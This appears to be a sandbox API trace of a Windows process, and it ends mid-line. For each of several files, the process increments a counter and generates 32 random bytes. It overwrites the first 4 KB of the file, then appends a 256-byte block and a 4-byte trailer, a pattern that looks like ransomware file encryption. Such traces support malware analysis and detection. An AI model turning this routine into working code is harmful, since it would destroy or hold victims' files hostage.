[0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.499] GetProcessHeap () returned 0x280000 [0075.499] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.499] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.500] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.500] WriteFile (in: hFile=0x798, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.500] WriteFile (in: hFile=0x798, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.500] GetProcessHeap () returned 0x280000 [0075.500] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.500] CloseHandle (hObject=0x798) returned 1 [0075.502] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 16 [0075.502] SetFilePointerEx (in: hFile=0x78c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.502] ReadFile (in: hFile=0x78c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.502] SetFilePointerEx (in: hFile=0x78c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.502] GetProcessHeap () returned 0x280000 [0075.502] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.502] GetProcessHeap () returned 0x280000 [0075.502] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.502] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.502] GetProcessHeap () returned 0x280000 [0075.502] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.502] ReadFile (in: hFile=0x78c, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.556] SetFilePointerEx (in: hFile=0x78c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.557] WriteFile (in: hFile=0x78c, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.557] GetProcessHeap () returned 0x280000 [0075.557] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.558] GetProcessHeap () returned 0x280000 [0075.558] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.558] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1ad0 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1ad0 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.559] GetProcessHeap () returned 0x280000 [0075.559] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.559] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.560] GetProcessHeap () returned 0x280000 [0075.560] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.560] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.561] GetProcessHeap () returned 0x280000 [0075.561] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.561] SetFilePointerEx (in: hFile=0x78c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.561] WriteFile (in: hFile=0x78c, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.562] WriteFile (in: hFile=0x78c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.562] GetProcessHeap () returned 0x280000 [0075.562] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.562] GetProcessHeap () returned 0x280000 [0075.562] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.562] GetProcessHeap () returned 0x280000 [0075.562] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.562] CloseHandle (hObject=0x78c) returned 1 [0075.582] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 17 [0075.582] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.582] ReadFile (in: hFile=0x7a0, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.582] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.582] GetProcessHeap () returned 0x280000 [0075.582] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.582] GetProcessHeap () returned 0x280000 [0075.582] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.582] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.582] GetProcessHeap () returned 0x280000 [0075.582] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.582] ReadFile (in: hFile=0x7a0, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.631] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.631] WriteFile (in: hFile=0x7a0, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.631] GetProcessHeap () returned 0x280000 [0075.631] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.632] GetProcessHeap () returned 0x280000 [0075.632] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.632] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.633] GetProcessHeap () returned 0x280000 [0075.633] HeapFree (in: hHeap=0x280000, 